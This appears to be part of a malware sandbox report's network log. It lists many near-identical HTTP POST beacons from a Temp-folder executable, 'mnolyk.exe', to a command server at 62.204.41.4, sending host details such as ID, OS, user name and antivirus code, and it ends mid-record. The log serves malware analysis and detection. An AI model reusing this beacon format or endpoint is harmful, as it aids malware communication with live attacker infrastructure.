                                                        Data Ascii: 6<c><d>0


                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                        424         192.168.2.5  50114        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp                           kBytes transferred  Direction  Data
                                                        Feb 6, 2023 14:18:42.789843082 CET  624                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:42.853933096 CET  625                 IN         HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:42 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                        425         192.168.2.5  50115        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp                           kBytes transferred  Direction  Data
                                                        Feb 6, 2023 14:18:43.044125080 CET  625                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:43.110388994 CET  626                 IN         HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:43 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                        426         192.168.2.5  50116        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp                           kBytes transferred  Direction  Data
                                                        Feb 6, 2023 14:18:43.292412043 CET  626                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:43.357706070 CET  627                 IN         HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:43 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                        427         192.168.2.5  50117        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp                           kBytes transferred  Direction  Data
                                                        Feb 6, 2023 14:18:43.523915052 CET  627                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:43.587764978 CET  628                 IN         HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:43 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                        428         192.168.2.5  50118        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp                           kBytes transferred  Direction  Data
                                                        Feb 6, 2023 14:18:43.766871929 CET  628                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:43.830147028 CET  629                 IN         HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:43 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                        429         192.168.2.5  50119        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp                           kBytes transferred  Direction  Data
                                                        Feb 6, 2023 14:18:44.008779049 CET  629                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:44.075440884 CET  630                 IN         HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:44 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                        43          192.168.2.5  49733        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp                           kBytes transferred  Direction  Data
                                                        Feb 6, 2023 14:16:51.368597031 CET  244                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:51.434515953 CET  244                 IN         HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:51 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                        430         192.168.2.5  50120        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp                           kBytes transferred  Direction  Data
                                                        Feb 6, 2023 14:18:44.246464968 CET  630                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:44.311366081 CET  631                 IN         HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:44 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                        431         192.168.2.5  50121        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp                           kBytes transferred  Direction  Data
                                                        Feb 6, 2023 14:18:44.477396011 CET  631                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:44.541924000 CET  632                 IN         HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:44 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                        432         192.168.2.5  50122        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp                           kBytes transferred  Direction  Data
                                                        Feb 6, 2023 14:18:44.731116056 CET  632                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:44.796539068 CET | 633 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:44 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        433 | 192.168.2.5 | 50123 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:44.976743937 CET | 633 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:45.042740107 CET | 634 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:45 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        434 | 192.168.2.5 | 50124 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:45.227690935 CET | 634 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:45.292344093 CET | 635 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:45 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        435 | 192.168.2.5 | 50125 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:45.461673021 CET | 635 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:45.543565035 CET | 636 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:45 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        436 | 192.168.2.5 | 50126 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:45.717299938 CET | 636 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:45.781358957 CET | 637 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:45 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        437 | 192.168.2.5 | 50127 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:45.946491003 CET | 637 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:46.009880066 CET | 638 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:45 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        438 | 192.168.2.5 | 50128 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:46.183273077 CET | 638 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:46.249476910 CET | 639 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:46 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        439 | 192.168.2.5 | 50129 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:46.436569929 CET | 639 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:46.500448942 CET | 640 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:46 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        44 | 192.168.2.5 | 49734 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:51.611738920 CET | 245 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:51.678834915 CET | 245 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:51 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        440 | 192.168.2.5 | 50130 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:46.681000948 CET | 640 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:46.745626926 CET | 641 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:46 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        441 | 192.168.2.5 | 50131 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:46.931869984 CET | 641 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
